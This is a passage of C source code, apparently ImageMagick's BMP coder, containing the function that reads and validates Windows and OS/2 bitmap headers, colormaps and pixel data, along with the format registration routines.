(LocaleNCompare((char *) magick,"CI",2) == 0) ||
(LocaleNCompare((char *) magick,"CP",2) == 0))
return(MagickTrue);
return(MagickFalse);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% R e a d B M P I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ReadBMPImage() reads a Microsoft Windows bitmap image file, Version
% 2, 3 (for Windows or NT), or 4, and returns it. It allocates the memory
% necessary for the new Image structure and returns a pointer to the new
% image.
%
% The format of the ReadBMPImage method is:
%
% image=ReadBMPImage(image_info)
%
% A description of each parameter follows:
%
% o image_info: the image info.
%
% o exception: return any errors or warnings in this structure.
%
*/
static Image *ReadBMPImage(const ImageInfo *image_info,ExceptionInfo *exception)
{
BMPInfo
bmp_info;
Image
*image;
MagickBooleanType
status;
MagickOffsetType
offset,
start_position;
MemoryInfo
*pixel_info;
Quantum
index;
register Quantum
*q;
register ssize_t
i,
x;
register unsigned char
*p;
size_t
bit,
blue,
bytes_per_line,
green,
length,
red;
ssize_t
count,
y;
unsigned char
magick[12],
*pixels;
/*
Open image file.
*/
assert(image_info != (const ImageInfo *) NULL);
assert(image_info->signature == MagickCoreSignature);
if (image_info->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",
image_info->filename);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
image=AcquireImage(image_info,exception);
status=OpenBlob(image_info,image,ReadBinaryBlobMode,exception);
if (status == MagickFalse)
{
image=DestroyImageList(image);
return((Image *) NULL);
}
/*
Determine if this a BMP file.
*/
(void) ResetMagickMemory(&bmp_info,0,sizeof(bmp_info));
bmp_info.ba_offset=0;
start_position=0;
count=ReadBlob(image,2,magick);
if (count != 2)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
do
{
PixelInfo
quantum_bits;
PixelPacket
shift;
size_t
profile_data,
profile_size;
/*
Verify BMP identifier.
*/
if (bmp_info.ba_offset == 0)
start_position=TellBlob(image)-2;
bmp_info.ba_offset=0;
while (LocaleNCompare((char *) magick,"BA",2) == 0)
{
bmp_info.file_size=ReadBlobLSBLong(image);
bmp_info.ba_offset=ReadBlobLSBLong(image);
bmp_info.offset_bits=ReadBlobLSBLong(image);
count=ReadBlob(image,2,magick);
if (count != 2)
break;
}
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule()," Magick: %c%c",
magick[0],magick[1]);
if ((count != 2) || ((LocaleNCompare((char *) magick,"BM",2) != 0) &&
(LocaleNCompare((char *) magick,"CI",2) != 0)))
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
bmp_info.file_size=ReadBlobLSBLong(image);
(void) ReadBlobLSBLong(image);
bmp_info.offset_bits=ReadBlobLSBLong(image);
bmp_info.size=ReadBlobLSBLong(image);
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule()," BMP size: %lu",
bmp_info.size);
if (bmp_info.size == 12)
{
/*
OS/2 BMP image file.
*/
(void) CopyMagickString(image->magick,"BMP2",MagickPathExtent);
bmp_info.width=(ssize_t) ((short) ReadBlobLSBShort(image));
bmp_info.height=(ssize_t) ((short) ReadBlobLSBShort(image));
bmp_info.planes=ReadBlobLSBShort(image);
bmp_info.bits_per_pixel=ReadBlobLSBShort(image);
bmp_info.x_pixels=0;
bmp_info.y_pixels=0;
bmp_info.number_colors=0;
bmp_info.compression=BI_RGB;
bmp_info.image_size=0;
bmp_info.alpha_mask=0;
if (image->debug != MagickFalse)
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Format: OS/2 Bitmap");
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Geometry: %.20gx%.20g",(double) bmp_info.width,(double)
bmp_info.height);
}
}
else
{
/*
Microsoft Windows BMP image file.
*/
if (bmp_info.size < 40)
ThrowReaderException(CorruptImageError,"NonOS2HeaderSizeError");
bmp_info.width=(ssize_t) ReadBlobLSBSignedLong(image);
bmp_info.height=(ssize_t) ReadBlobLSBSignedLong(image);
bmp_info.planes=ReadBlobLSBShort(image);
bmp_info.bits_per_pixel=ReadBlobLSBShort(image);
bmp_info.compression=ReadBlobLSBLong(image);
bmp_info.image_size=ReadBlobLSBLong(image);
bmp_info.x_pixels=ReadBlobLSBLong(image);
bmp_info.y_pixels=ReadBlobLSBLong(image);
bmp_info.number_colors=ReadBlobLSBLong(image);
bmp_info.colors_important=ReadBlobLSBLong(image);
profile_data=0;
profile_size=0;
if (image->debug != MagickFalse)
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Format: MS Windows bitmap");
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Geometry: %.20gx%.20g",(double) bmp_info.width,(double)
bmp_info.height);
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Bits per pixel: %.20g",(double) bmp_info.bits_per_pixel);
switch ((int) bmp_info.compression)
{
case BI_RGB:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: BI_RGB");
break;
}
case BI_RLE4:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: BI_RLE4");
break;
}
case BI_RLE8:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: BI_RLE8");
break;
}
case BI_BITFIELDS:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: BI_BITFIELDS");
break;
}
case BI_PNG:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: BI_PNG");
break;
}
case BI_JPEG:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: BI_JPEG");
break;
}
default:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: UNKNOWN (%lu)",bmp_info.compression);
}
}
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Number of colors: %lu",bmp_info.number_colors);
}
bmp_info.red_mask=ReadBlobLSBLong(image);
bmp_info.green_mask=ReadBlobLSBLong(image);
bmp_info.blue_mask=ReadBlobLSBLong(image);
if (bmp_info.size > 40)
{
double
gamma;
/*
Read color management information.
*/
bmp_info.alpha_mask=ReadBlobLSBLong(image);
bmp_info.colorspace=ReadBlobLSBSignedLong(image);
/*
Decode 2^30 fixed point formatted CIE primaries.
*/
# define BMP_DENOM ((double) 0x40000000)
bmp_info.red_primary.x=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.red_primary.y=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.red_primary.z=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.green_primary.x=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.green_primary.y=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.green_primary.z=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.blue_primary.x=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.blue_primary.y=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.blue_primary.z=(double) ReadBlobLSBLong(image)/BMP_DENOM;
gamma=bmp_info.red_primary.x+bmp_info.red_primary.y+
bmp_info.red_primary.z;
gamma=PerceptibleReciprocal(gamma);
bmp_info.red_primary.x*=gamma;
bmp_info.red_primary.y*=gamma;
image->chromaticity.red_primary.x=bmp_info.red_primary.x;
image->chromaticity.red_primary.y=bmp_info.red_primary.y;
gamma=bmp_info.green_primary.x+bmp_info.green_primary.y+
bmp_info.green_primary.z;
gamma=PerceptibleReciprocal(gamma);
bmp_info.green_primary.x*=gamma;
bmp_info.green_primary.y*=gamma;
image->chromaticity.green_primary.x=bmp_info.green_primary.x;
image->chromaticity.green_primary.y=bmp_info.green_primary.y;
gamma=bmp_info.blue_primary.x+bmp_info.blue_primary.y+
bmp_info.blue_primary.z;
gamma=PerceptibleReciprocal(gamma);
bmp_info.blue_primary.x*=gamma;
bmp_info.blue_primary.y*=gamma;
image->chromaticity.blue_primary.x=bmp_info.blue_primary.x;
image->chromaticity.blue_primary.y=bmp_info.blue_primary.y;
/*
Decode 16^16 fixed point formatted gamma_scales.
*/
bmp_info.gamma_scale.x=(double) ReadBlobLSBLong(image)/0x10000;
bmp_info.gamma_scale.y=(double) ReadBlobLSBLong(image)/0x10000;
bmp_info.gamma_scale.z=(double) ReadBlobLSBLong(image)/0x10000;
/*
Compute a single gamma from the BMP 3-channel gamma.
*/
image->gamma=(bmp_info.gamma_scale.x+bmp_info.gamma_scale.y+
bmp_info.gamma_scale.z)/3.0;
}
else
(void) CopyMagickString(image->magick,"BMP3",MagickPathExtent);
if (bmp_info.size > 108)
{
size_t
intent;
/*
Read BMP Version 5 color management information.
*/
intent=ReadBlobLSBLong(image);
switch ((int) intent)
{
case LCS_GM_BUSINESS:
{
image->rendering_intent=SaturationIntent;
break;
}
case LCS_GM_GRAPHICS:
{
image->rendering_intent=RelativeIntent;
break;
}
case LCS_GM_IMAGES:
{
image->rendering_intent=PerceptualIntent;
break;
}
case LCS_GM_ABS_COLORIMETRIC:
{
image->rendering_intent=AbsoluteIntent;
break;
}
}
profile_data=ReadBlobLSBLong(image);
profile_size=ReadBlobLSBLong(image);
(void) profile_data;
(void) profile_size;
(void) ReadBlobLSBLong(image); /* Reserved byte */
}
}
if ((MagickSizeType) bmp_info.file_size > GetBlobSize(image))
(void) ThrowMagickException(exception,GetMagickModule(),CorruptImageError,
"LengthAndFilesizeDoNotMatch","`%s'",image->filename);
else
if ((MagickSizeType) bmp_info.file_size < GetBlobSize(image))
(void) ThrowMagickException(exception,GetMagickModule(),
CorruptImageWarning,"LengthAndFilesizeDoNotMatch","`%s'",
image->filename);
if (bmp_info.width <= 0)
ThrowReaderException(CorruptImageError,"NegativeOrZeroImageSize");
if (bmp_info.height == 0)
ThrowReaderException(CorruptImageError,"NegativeOrZeroImageSize");
if (bmp_info.planes != 1)
ThrowReaderException(CorruptImageError,"StaticPlanesValueNotEqualToOne");
if ((bmp_info.bits_per_pixel != 1) && (bmp_info.bits_per_pixel != 4) &&
(bmp_info.bits_per_pixel != 8) && (bmp_info.bits_per_pixel != 16) &&
(bmp_info.bits_per_pixel != 24) && (bmp_info.bits_per_pixel != 32))
ThrowReaderException(CorruptImageError,"UnrecognizedBitsPerPixel");
if (bmp_info.bits_per_pixel < 16 &&
bmp_info.number_colors > (1U << bmp_info.bits_per_pixel))
ThrowReaderException(CorruptImageError,"UnrecognizedNumberOfColors");
if ((bmp_info.compression == 1) && (bmp_info.bits_per_pixel != 8))
ThrowReaderException(CorruptImageError,"UnrecognizedBitsPerPixel");
if ((bmp_info.compression == 2) && (bmp_info.bits_per_pixel != 4))
ThrowReaderException(CorruptImageError,"UnrecognizedBitsPerPixel");
if ((bmp_info.compression == 3) && (bmp_info.bits_per_pixel < 16))
ThrowReaderException(CorruptImageError,"UnrecognizedBitsPerPixel");
switch (bmp_info.compression)
{
case BI_RGB:
image->compression=NoCompression;
break;
case BI_RLE8:
case BI_RLE4:
image->compression=RLECompression;
break;
case BI_BITFIELDS:
break;
case BI_JPEG:
ThrowReaderException(CoderError,"JPEGCompressNotSupported");
case BI_PNG:
ThrowReaderException(CoderError,"PNGCompressNotSupported");
default:
ThrowReaderException(CorruptImageError,"UnrecognizedImageCompression");
}
image->columns=(size_t) MagickAbsoluteValue(bmp_info.width);
image->rows=(size_t) MagickAbsoluteValue(bmp_info.height);
image->depth=bmp_info.bits_per_pixel <= 8 ? bmp_info.bits_per_pixel : 8;
image->alpha_trait=((bmp_info.alpha_mask != 0) &&
(bmp_info.compression == BI_BITFIELDS)) ? BlendPixelTrait :
UndefinedPixelTrait;
if (bmp_info.bits_per_pixel < 16)
{
size_t
one;
image->storage_class=PseudoClass;
image->colors=bmp_info.number_colors;
one=1;
if (image->colors == 0)
image->colors=one << bmp_info.bits_per_pixel;
}
if (image->storage_class == PseudoClass)
{
unsigned char
*bmp_colormap;
size_t
packet_size;
/*
Read BMP raster colormap.
*/
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Reading colormap of %.20g colors",(double) image->colors);
if (AcquireImageColormap(image,image->colors,exception) == MagickFalse)
ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed");
bmp_colormap=(unsigned char *) AcquireQuantumMemory((size_t)
image->colors,4*sizeof(*bmp_colormap));
if (bmp_colormap == (unsigned char *) NULL)
ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed");
if ((bmp_info.size == 12) || (bmp_info.size == 64))
packet_size=3;
else
packet_size=4;
offset=SeekBlob(image,start_position+14+bmp_info.size,SEEK_SET);
if (offset < 0)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
count=ReadBlob(image,packet_size*image->colors,bmp_colormap);
if (count != (ssize_t) (packet_size*image->colors))
ThrowReaderException(CorruptImageError,"InsufficientImageDataInFile");
p=bmp_colormap;
for (i=0; i < (ssize_t) image->colors; i++)
{
image->colormap[i].blue=(MagickRealType) ScaleCharToQuantum(*p++);
image->colormap[i].green=(MagickRealType) ScaleCharToQuantum(*p++);
image->colormap[i].red=(MagickRealType) ScaleCharToQuantum(*p++);
if (packet_size == 4)
p++;
}
bmp_colormap=(unsigned char *) RelinquishMagickMemory(bmp_colormap);
}
image->resolution.x=(double) bmp_info.x_pixels/100.0;
image->resolution.y=(double) bmp_info.y_pixels/100.0;
image->units=PixelsPerCentimeterResolution;
if ((image_info->ping != MagickFalse) && (image_info->number_scenes != 0))
if (image->scene >= (image_info->scene+image_info->number_scenes-1))
break;
status=SetImageExtent(image,image->columns,image->rows,exception);
if (status == MagickFalse)
return(DestroyImageList(image));
/*
Read image data.
*/
offset=SeekBlob(image,start_position+bmp_info.offset_bits,SEEK_SET);
if (offset < 0)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
if (bmp_info.compression == BI_RLE4)
bmp_info.bits_per_pixel<<=1;
bytes_per_line=4*((image->columns*bmp_info.bits_per_pixel+31)/32);
length=(size_t) bytes_per_line*image->rows;
pixel_info=AcquireVirtualMemory((size_t) image->rows,
MagickMax(bytes_per_line,image->columns+256UL)*sizeof(*pixels));
if (pixel_info == (MemoryInfo *) NULL)
ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed");
pixels=(unsigned char *) GetVirtualMemoryBlob(pixel_info);
if ((bmp_info.compression == BI_RGB) ||
(bmp_info.compression == BI_BITFIELDS))
{
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Reading pixels (%.20g bytes)",(double) length);
count=ReadBlob(image,length,pixels);
if (count != (ssize_t) length)
{
pixel_info=RelinquishVirtualMemory(pixel_info);
ThrowReaderException(CorruptImageError,
"InsufficientImageDataInFile");
}
}
else
{
/*
Convert run-length encoded raster pixels.
*/
status=DecodeImage(image,bmp_info.compression,pixels);
if (status == MagickFalse)
{
pixel_info=RelinquishVirtualMemory(pixel_info);
ThrowReaderException(CorruptImageError,
"UnableToRunlengthDecodeImage");
}
}
/*
Convert BMP raster image to pixel packets.
*/
if (bmp_info.compression == BI_RGB)
{
/*
We should ignore the alpha value in BMP3 files but there have been
reports about 32 bit files with alpha. We do a quick check to see if
the alpha channel contains a value that is not zero (default value).
If we find a non zero value we asume the program that wrote the file
wants to use the alpha channel.
*/
if ((image->alpha_trait == UndefinedPixelTrait) && (bmp_info.size == 40) &&
(bmp_info.bits_per_pixel == 32))
{
bytes_per_line=4*(image->columns);
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
p=pixels+(image->rows-y-1)*bytes_per_line;
for (x=0; x < (ssize_t) image->columns; x++)
{
if (*(p+3) != 0)
{
image->alpha_trait=BlendPixelTrait;
y=-1;
break;
}
p+=4;
}
}
}
bmp_info.alpha_mask=image->alpha_trait != UndefinedPixelTrait ?
0xff000000U : 0U;
bmp_info.red_mask=0x00ff0000U;
bmp_info.green_mask=0x0000ff00U;
bmp_info.blue_mask=0x000000ffU;
if (bmp_info.bits_per_pixel == 16)
{
/*
RGB555.
*/
bmp_info.red_mask=0x00007c00U;
bmp_info.green_mask=0x000003e0U;
bmp_info.blue_mask=0x0000001fU;
}
}
(void) ResetMagickMemory(&shift,0,sizeof(shift));
(void) ResetMagickMemory(&quantum_bits,0,sizeof(quantum_bits));
if ((bmp_info.bits_per_pixel == 16) || (bmp_info.bits_per_pixel == 32))
{
register size_t
sample;
/*
Get shift and quantum bits info from bitfield masks.
*/
if (bmp_info.red_mask != 0)
while (((bmp_info.red_mask << shift.red) & 0x80000000UL) == 0)
shift.red++;
if (bmp_info.green_mask != 0)
while (((bmp_info.green_mask << shift.green) & 0x80000000UL) == 0)
shift.green++;
if (bmp_info.blue_mask != 0)
while (((bmp_info.blue_mask << shift.blue) & 0x80000000UL) == 0)
shift.blue++;
if (bmp_info.alpha_mask != 0)
while (((bmp_info.alpha_mask << shift.alpha) & 0x80000000UL) == 0)
shift.alpha++;
sample=shift.red;
while (((bmp_info.red_mask << sample) & 0x80000000UL) != 0)
sample++;
quantum_bits.red=(MagickRealType) (sample-shift.red);
sample=shift.green;
while (((bmp_info.green_mask << sample) & 0x80000000UL) != 0)
sample++;
quantum_bits.green=(MagickRealType) (sample-shift.green);
sample=shift.blue;
while (((bmp_info.blue_mask << sample) & 0x80000000UL) != 0)
sample++;
quantum_bits.blue=(MagickRealType) (sample-shift.blue);
sample=shift.alpha;
while (((bmp_info.alpha_mask << sample) & 0x80000000UL) != 0)
sample++;
quantum_bits.alpha=(MagickRealType) (sample-shift.alpha);
}
switch (bmp_info.bits_per_pixel)
{
case 1:
{
/*
Convert bitmap scanline.
*/
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
p=pixels+(image->rows-y-1)*bytes_per_line;
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=0; x < ((ssize_t) image->columns-7); x+=8)
{
for (bit=0; bit < 8; bit++)
{
index=(Quantum) (((*p) & (0x80 >> bit)) != 0 ? 0x01 : 0x00);
SetPixelIndex(image,index,q);
q+=GetPixelChannels(image);
}
p++;
}
if ((image->columns % 8) != 0)
{
for (bit=0; bit < (image->columns % 8); bit++)
{
index=(Quantum) (((*p) & (0x80 >> bit)) != 0 ? 0x01 : 0x00);
SetPixelIndex(image,index,q);
q+=GetPixelChannels(image);
}
p++;
}
if (SyncAuthenticPixels(image,exception) == MagickFalse)
break;
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType)
(image->rows-y),image->rows);
if (status == MagickFalse)
break;
}
}
(void) SyncImage(image,exception);
break;
}
case 4:
{
/*
Convert PseudoColor scanline.
*/
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
p=pixels+(image->rows-y-1)*bytes_per_line;
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=0; x < ((ssize_t) image->columns-1); x+=2)
{
ValidateColormapValue(image,(*p >> 4) & 0x0f,&index,exception);
SetPixelIndex(image,index,q);
q+=GetPixelChannels(image);
ValidateColormapValue(image,*p & 0x0f,&index,exception);
SetPixelIndex(image,index,q);
q+=GetPixelChannels(image);
p++;
}
if ((image->columns % 2) != 0)
{
ValidateColormapValue(image,(*p >> 4) & 0xf,&index,exception);
SetPixelIndex(image,index,q);
q+=GetPixelChannels(image);
p++;
x++;
}
if (x < (ssize_t) image->columns)
break;
if (SyncAuthenticPixels(image,exception) == MagickFalse)
break;
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType)
(image->rows-y),image->rows);
if (status == MagickFalse)
break;
}
}
(void) SyncImage(image,exception);
break;
}
case 8:
{
/*
Convert PseudoColor scanline.
*/
if ((bmp_info.compression == BI_RLE8) ||
(bmp_info.compression == BI_RLE4))
bytes_per_line=image->columns;
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
p=pixels+(image->rows-y-1)*bytes_per_line;
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=(ssize_t) image->columns; x != 0; --x)
{
ValidateColormapValue(image,*p++,&index,exception);
SetPixelIndex(image,index,q);
q+=GetPixelChannels(image);
}
if (x > 0)
break;
if (SyncAuthenticPixels(image,exception) == MagickFalse)
break;
offset=(MagickOffsetType) (image->rows-y-1);
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType)
(image->rows-y),image->rows);
if (status == MagickFalse)
break;
}
}
(void) SyncImage(image,exception);
break;
}
case 16:
{
size_t
alpha,
pixel;
/*
Convert bitfield encoded 16-bit PseudoColor scanline.
*/
if (bmp_info.compression != BI_RGB &&
bmp_info.compression != BI_BITFIELDS)
{
pixel_info=RelinquishVirtualMemory(pixel_info);
ThrowReaderException(CorruptImageError,
"UnrecognizedImageCompression");
}
bytes_per_line=2*(image->columns+image->columns % 2);
image->storage_class=DirectClass;
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
p=pixels+(image->rows-y-1)*bytes_per_line;
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=0; x < (ssize_t) image->columns; x++)
{
pixel=(size_t) (*p++);
pixel|=(*p++) << 8;
red=((pixel & bmp_info.red_mask) << shift.red) >> 16;
if (quantum_bits.red == 5)
red|=((red & 0xe000) >> 5);
if (quantum_bits.red <= 8)
red|=((red & 0xff00) >> 8);
green=((pixel & bmp_info.green_mask) << shift.green) >> 16;
if (quantum_bits.green == 5)
green|=((green & 0xe000) >> 5);
if (quantum_bits.green == 6)
green|=((green & 0xc000) >> 6);
if (quantum_bits.green <= 8)
green|=((green & 0xff00) >> 8);
blue=((pixel & bmp_info.blue_mask) << shift.blue) >> 16;
if (quantum_bits.blue == 5)
blue|=((blue & 0xe000) >> 5);
if (quantum_bits.blue <= 8)
blue|=((blue & 0xff00) >> 8);
SetPixelRed(image,ScaleShortToQuantum((unsigned short) red),q);
SetPixelGreen(image,ScaleShortToQuantum((unsigned short) green),q);
SetPixelBlue(image,ScaleShortToQuantum((unsigned short) blue),q);
SetPixelAlpha(image,OpaqueAlpha,q);
if (image->alpha_trait != UndefinedPixelTrait)
{
alpha=((pixel & bmp_info.alpha_mask) << shift.alpha) >> 16;
if (quantum_bits.alpha <= 8)
alpha|=((alpha & 0xff00) >> 8);
SetPixelAlpha(image,ScaleShortToQuantum(
(unsigned short) alpha),q);
}
q+=GetPixelChannels(image);
}
if (SyncAuthenticPixels(image,exception) == MagickFalse)
break;
offset=(MagickOffsetType) (image->rows-y-1);
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType)
(image->rows-y),image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
case 24:
{
/*
Convert DirectColor scanline.
*/
bytes_per_line=4*((image->columns*24+31)/32);
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
p=pixels+(image->rows-y-1)*bytes_per_line;
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=0; x < (ssize_t) image->columns; x++)
{
SetPixelBlue(image,ScaleCharToQuantum(*p++),q);
SetPixelGreen(image,ScaleCharToQuantum(*p++),q);
SetPixelRed(image,ScaleCharToQuantum(*p++),q);
SetPixelAlpha(image,OpaqueAlpha,q);
q+=GetPixelChannels(image);
}
if (SyncAuthenticPixels(image,exception) == MagickFalse)
break;
offset=(MagickOffsetType) (image->rows-y-1);
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType)
(image->rows-y),image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
case 32:
{
/*
Convert bitfield encoded DirectColor scanline.
*/
if ((bmp_info.compression != BI_RGB) &&
(bmp_info.compression != BI_BITFIELDS))
{
pixel_info=RelinquishVirtualMemory(pixel_info);
ThrowReaderException(CorruptImageError,
"UnrecognizedImageCompression");
}
bytes_per_line=4*(image->columns);
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
size_t
alpha,
pixel;
p=pixels+(image->rows-y-1)*bytes_per_line;
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=0; x < (ssize_t) image->columns; x++)
{
pixel=(size_t) (*p++);
pixel|=((size_t) *p++ << 8);
pixel|=((size_t) *p++ << 16);
pixel|=((size_t) *p++ << 24);
red=((pixel & bmp_info.red_mask) << shift.red) >> 16;
if (quantum_bits.red == 8)
red|=(red >> 8);
green=((pixel & bmp_info.green_mask) << shift.green) >> 16;
if (quantum_bits.green == 8)
green|=(green >> 8);
blue=((pixel & bmp_info.blue_mask) << shift.blue) >> 16;
if (quantum_bits.blue == 8)
blue|=(blue >> 8);
SetPixelRed(image,ScaleShortToQuantum((unsigned short) red),q);
SetPixelGreen(image,ScaleShortToQuantum((unsigned short) green),q);
SetPixelBlue(image,ScaleShortToQuantum((unsigned short) blue),q);
SetPixelAlpha(image,OpaqueAlpha,q);
if (image->alpha_trait != UndefinedPixelTrait)
{
alpha=((pixel & bmp_info.alpha_mask) << shift.alpha) >> 16;
if (quantum_bits.alpha == 8)
alpha|=(alpha >> 8);
SetPixelAlpha(image,ScaleShortToQuantum(
(unsigned short) alpha),q);
}
q+=GetPixelChannels(image);
}
if (SyncAuthenticPixels(image,exception) == MagickFalse)
break;
offset=(MagickOffsetType) (image->rows-y-1);
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType)
(image->rows-y),image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
default:
{
pixel_info=RelinquishVirtualMemory(pixel_info);
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
}
}
pixel_info=RelinquishVirtualMemory(pixel_info);
if (y > 0)
break;
if (EOFBlob(image) != MagickFalse)
{
ThrowFileException(exception,CorruptImageError,"UnexpectedEndOfFile",
image->filename);
break;
}
if (bmp_info.height < 0)
{
Image
*flipped_image;
/*
Correct image orientation.
*/
flipped_image=FlipImage(image,exception);
if (flipped_image != (Image *) NULL)
{
DuplicateBlob(flipped_image,image);
image=DestroyImage(image);
image=flipped_image;
}
}
/*
Proceed to next image.
*/
if (image_info->number_scenes != 0)
if (image->scene >= (image_info->scene+image_info->number_scenes-1))
break;
*magick='\0';
if (bmp_info.ba_offset != 0)
{
offset=SeekBlob(image,(MagickOffsetType) bmp_info.ba_offset,SEEK_SET);
if (offset < 0)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
}
count=ReadBlob(image,2,magick);
if ((count == 2) && (IsBMP(magick,2) != MagickFalse))
{
/*
Acquire next image structure.
*/
AcquireNextImage(image_info,image,exception);
if (GetNextImageInList(image) == (Image *) NULL)
{
image=DestroyImageList(image);
return((Image *) NULL);
}
image=SyncNextImageInList(image);
status=SetImageProgress(image,LoadImagesTag,TellBlob(image),
GetBlobSize(image));
if (status == MagickFalse)
break;
}
} while (IsBMP(magick,2) != MagickFalse);
(void) CloseBlob(image);
return(GetFirstImageInList(image));
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% R e g i s t e r B M P I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% RegisterBMPImage() adds attributes for the BMP image format to
% the list of supported formats. The attributes include the image format
% tag, a method to read and/or write the format, whether the format
% supports the saving of more than one frame to the same file or blob,
% whether the format supports native in-memory I/O, and a brief
% description of the format.
%
% The format of the RegisterBMPImage method is:
%
% size_t RegisterBMPImage(void)
%
*/
ModuleExport size_t RegisterBMPImage(void)
{
MagickInfo
*entry;
entry=AcquireMagickInfo("BMP","BMP","Microsoft Windows bitmap image");
entry->decoder=(DecodeImageHandler *) ReadBMPImage;
entry->encoder=(EncodeImageHandler *) WriteBMPImage;
entry->magick=(IsImageFormatHandler *) IsBMP;
entry->flags^=CoderAdjoinFlag;
entry->flags|=CoderSeekableStreamFlag;
(void) RegisterMagickInfo(entry);
entry=AcquireMagickInfo("BMP","BMP2","Microsoft Windows bitmap image (V2)");
entry->encoder=(EncodeImageHandler *) WriteBMPImage;
entry->magick=(IsImageFormatHandler *) IsBMP;
entry->flags^=CoderAdjoinFlag;
entry->flags|=CoderSeekableStreamFlag;
(void) RegisterMagickInfo(entry);
entry=AcquireMagickInfo("BMP","BMP3","Microsoft Windows bitmap image (V3)");
entry->encoder=(EncodeImageHandler *) WriteBMPImage;
entry->magick=(IsImageFormatHandler *) IsBMP;
entry->flags^=CoderAdjoinFlag;
entry->flags|=CoderSeekableStreamFlag;
(void) RegisterMagickInfo(entry);
return(MagickImageCoderSignature);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% U n r e g i s t e r B M P I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% UnregisterBMPImage() removes format registrations made by the
% BMP module from the list of supported formats.
%
% The format of the UnregisterBMPImage method is:
%
% UnregisterBMPImage(void)
%
*/
ModuleExport void UnregisterBMPImage(void)
{
(void) UnregisterMagickInfo("BMP");
(void) UnregisterMagickInfo("BMP2");
(void) UnregisterMagickInfo("BMP3");
}
/*
